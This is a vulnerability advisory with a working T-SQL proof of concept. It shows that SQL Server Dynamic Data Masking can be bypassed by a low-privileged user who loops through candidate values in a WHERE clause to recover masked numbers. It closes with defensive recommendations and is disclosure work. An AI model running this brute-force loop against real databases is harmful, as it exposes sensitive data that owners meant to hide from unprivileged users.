Title: SQL Server Masked Data Exposure Through Brute Force Attack
Product:                   Database
Manufacturer:              Microsoft
Affected Version(s):       SQL Server 2014, 2016,2017,2019,2022
Tested Version(s):         SQL Server 2014, 2016,2017,2019,2022
Risk Level:                Low
Security Feature:          Dynamic Data Masking
Author of Advisory:        Emad Al-Mousa


*****************************************
Vulnerability Details And Back Ground:

Microsoft SQL Server database system has a security feature called "dynamic data masking" , this feature is designed to redact/mask column level values (columns containing sensitive data ….for example credit card number…etc).

The feature is good but has many security weaknesses that organizations/companies should be aware of. Among them is brute force technique against the “where” conditional clause to retrieve actual data values (numeric values).



*****************************************
Proof of Concept (PoC):

I will create database called demodb and create table called dbo.COMPANY and insert dummy data in it:

create database demodb;

USE [demodb]

GO

SET ANSI_NULLS ON

GO

SET QUOTED_IDENTIFIER ON

GO

CREATE TABLE [dbo].[COMPANY](

[COMPANY_NAME] [nvarchar](max) NULL,

[SALES] [int] NULL

) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]

GO

USE [demodb]

GO

INSERT INTO [dbo].[COMPANY]

           ([COMPANY_NAME]

           ,[SALES])

     VALUES

           ('COMPANY_C','93')

GO

USE [demodb]

GO

INSERT INTO [dbo].[COMPANY]

           ([COMPANY_NAME]

           ,[SALES])

     VALUES

           ('COMPANY_A','11')

GO


USE [demodb]

GO

INSERT INTO [dbo].[COMPANY]

           ([COMPANY_NAME]

           ,[SALES])

     VALUES

           ('COMPANY_B','78')

GO

------  I will enable dynamic data masking function against SALES column:

 ALTER TABLE dbo.COMPANY

ALTER COLUMN SALES INT MASKED WITH (FUNCTION = 'default()');

------ Then, will create a user called reg_user that can only query the table, so the user will only see SALES column with complete masked data [ZERO values]:

USE [demodb]

GO

CREATE USER reg_user WITHOUT LOGIN;

GRANT SELECT ON dbo.COMPANY to reg_user;

EXECUTE AS USER = 'reg_user';

SELECT * FROM dbo.COMPANY;

REVERT;



------ However, using the same non-privileged database account reg_user …I will be able to extract Actual Values :


EXECUTE AS USER = 'reg_user';

 DECLARE @sales_txt nvarchar(max);

 DECLARE @LCounter INT= 1;

 WHILE (@LCounter < 99)

 BEGIN

SET @sales_txt=(SELECT COMPANY_NAME+' sales is ' +CAST (@LCounter as nvarchar)

   FROM dbo.COMPANY

   WHERE SALES=@LCounter)

   print @sales_txt

   SET @LCounter  = @LCounter  + 1

   END

REVERT;


Output:

COMPANY_A sales is 11

COMPANY_B sales is 78

COMPANY_C sales is 93



------ Actual values were successfully extracted from the masked column !


*****************************************

Protection Mechanisms:

1. Ensure network firewall rules are in-place to ensure database accounts can be connected to the destination database server host from specific list of source hosts. This will add good
security protection layer especially if database account credentials were exposed.

2. Implement Security Auditing against identified sensitive tables.

3. Implement other security features along dynamic data masking such as encryption. of course Always Encrypted feature is the best in terms of data protection.


*****************************************
References:
https://learn.microsoft.com/en-us/sql/relational-databases/security/dynamic-data-masking?view=sql-server-ver16
https://databasesecurityninja.wordpress.com/2023/08/08/hacking-sql-server-dynamic-data-masking-feature-with-brute-force-technique/
https://www.youtube.com/watch?v=NiAg0sGsGtw